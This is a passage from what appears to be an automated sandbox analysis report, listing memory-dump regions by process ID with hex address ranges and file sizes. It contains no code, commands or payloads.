                                                                                              • memory/2240-310-0x0000000004A70000-0x0000000004A71000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2244-309-0x0000000000400000-0x000000000045D000-memory.dmp
                                                                                                Filesize

                                                                                                372KB

                                                                                              • memory/2248-240-0x0000000000000000-mapping.dmp
                                                                                              • memory/2264-224-0x0000000000400000-0x000000000041C000-memory.dmp
                                                                                                Filesize

                                                                                                112KB

                                                                                              • memory/2264-236-0x0000000004C70000-0x0000000004C71000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2264-226-0x0000000000400000-0x000000000041C000-memory.dmp
                                                                                                Filesize

                                                                                                112KB

                                                                                              • memory/2264-225-0x00000000004171EE-mapping.dmp
                                                                                              • memory/2364-215-0x0000000000000000-mapping.dmp
                                                                                              • memory/2424-146-0x0000000000000000-mapping.dmp
                                                                                              • memory/2436-199-0x0000000000000000-mapping.dmp
                                                                                              • memory/2492-148-0x0000000000000000-mapping.dmp
                                                                                              • memory/2500-233-0x0000000000402F68-mapping.dmp
                                                                                              • memory/2500-232-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                Filesize

                                                                                                48KB

                                                                                              • memory/2528-299-0x0000000000000000-mapping.dmp
                                                                                              • memory/2528-253-0x0000000000000000-mapping.dmp
                                                                                              • memory/2556-153-0x0000000000000000-mapping.dmp
                                                                                              • memory/2568-302-0x0000000003E80000-0x0000000003F11000-memory.dmp
                                                                                                Filesize

                                                                                                580KB

                                                                                              • memory/2568-301-0x0000000000000000-mapping.dmp
                                                                                              • memory/2568-303-0x0000000000400000-0x0000000003DF0000-memory.dmp
                                                                                                Filesize

                                                                                                57.9MB

                                                                                              • memory/2580-186-0x0000000000000000-mapping.dmp
                                                                                              • memory/2588-194-0x0000000000000000-mapping.dmp
                                                                                              • memory/2656-121-0x0000000000000000-mapping.dmp
                                                                                              • memory/2668-193-0x0000000000000000-mapping.dmp
                                                                                              • memory/2720-290-0x0000000004A80000-0x0000000004A81000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2720-289-0x0000000000000000-mapping.dmp
                                                                                              • memory/2720-291-0x0000000004A82000-0x0000000004A83000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2724-261-0x0000000006190000-0x0000000006191000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2724-247-0x0000000005290000-0x0000000005291000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2724-262-0x000000007EF30000-0x000000007EF31000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2724-216-0x00000000048C0000-0x00000000048C1000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2724-256-0x0000000006150000-0x0000000006151000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2724-211-0x0000000000000000-mapping.dmp
                                                                                              • memory/2724-218-0x0000000004882000-0x0000000004883000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2724-217-0x0000000004880000-0x0000000004881000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2724-272-0x00000000065B0000-0x00000000065B1000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2724-237-0x0000000002520000-0x0000000002521000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2724-214-0x0000000000B50000-0x0000000000B51000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2724-264-0x0000000006230000-0x0000000006231000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2724-271-0x0000000005700000-0x0000000005701000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2732-123-0x0000000000000000-mapping.dmp
                                                                                              • memory/2780-239-0x0000000000000000-mapping.dmp
                                                                                              • memory/2784-191-0x0000000000000000-mapping.dmp
                                                                                              • memory/2784-308-0x0000000000220000-0x000000000023C000-memory.dmp
                                                                                                Filesize

                                                                                                112KB

                                                                                              • memory/2792-210-0x0000000000000000-mapping.dmp
                                                                                              • memory/2904-238-0x0000000000000000-mapping.dmp
                                                                                              • memory/2932-248-0x0000000000400000-0x0000000000430000-memory.dmp
                                                                                                Filesize

                                                                                                192KB

                                                                                              • memory/2932-158-0x0000000000000000-mapping.dmp
                                                                                              • memory/2932-263-0x0000000000580000-0x0000000000581000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2932-250-0x0000000000400000-0x0000000000430000-memory.dmp
                                                                                                Filesize

                                                                                                192KB

                                                                                              • memory/2932-249-0x000000000042977E-mapping.dmp
                                                                                              • memory/2936-207-0x0000000000240000-0x0000000000250000-memory.dmp
                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/2936-202-0x0000000000000000-mapping.dmp
                                                                                              • memory/2936-208-0x0000000000270000-0x0000000000282000-memory.dmp
                                                                                                Filesize

                                                                                                72KB

                                                                                              • memory/2940-131-0x0000000000000000-mapping.dmp
                                                                                              • memory/2940-140-0x0000000000C30000-0x0000000000C31000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2940-189-0x0000000000560000-0x0000000000561000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2948-197-0x0000000000000000-mapping.dmp
                                                                                              • memory/2984-220-0x0000000000000000-mapping.dmp
                                                                                              • memory/2996-209-0x0000000000000000-mapping.dmp
                                                                                              • memory/3012-160-0x0000000000000000-mapping.dmp
                                                                                              • memory/3040-252-0x0000000000000000-mapping.dmp
                                                                                              • memory/3056-134-0x0000000000000000-mapping.dmp
                                                                                              • memory/3064-231-0x0000000000220000-0x000000000022C000-memory.dmp
                                                                                                Filesize

                                                                                                48KB

                                                                                              • memory/3064-219-0x0000000000000000-mapping.dmp